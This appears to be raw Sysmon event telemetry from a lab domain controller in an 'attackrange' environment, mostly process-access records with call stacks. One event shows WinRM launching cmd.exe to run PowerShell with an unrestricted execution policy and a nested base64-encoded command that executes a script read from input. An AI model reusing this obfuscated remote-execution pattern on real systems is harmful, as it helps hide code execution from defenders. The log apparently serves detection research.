15:50:22.825{D28789B6-7C3E-5FA1-0003-000000008701}39522164C:\Windows\system32\WinrsHost.exe{D28789B6-7C3E-5FA1-0203-000000008701}2608C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.830{D28789B6-7C3E-5FA1-0203-000000008701}2608C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.825{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.810{D28789B6-7AD2-5FA1-1400-000000008701}13681468C:\Windows\system32\svchost.exe{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.810{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7C3E-5FA1-0103-000000008701}49881680C:\Windows\system32\conhost.exe{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-0103-000000008701}4988C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721116C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AC1-5FA1-0500-000000008701}636760C:\Windows\system32\csrss.exe{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.794{D28789B6-7C3E-5FA1-0003-000000008701}3952C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C3E-5FA1-38EB-100000000000}0x10eb380HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7AD1-5FA1-0C00-000000008701}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:22.779{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dl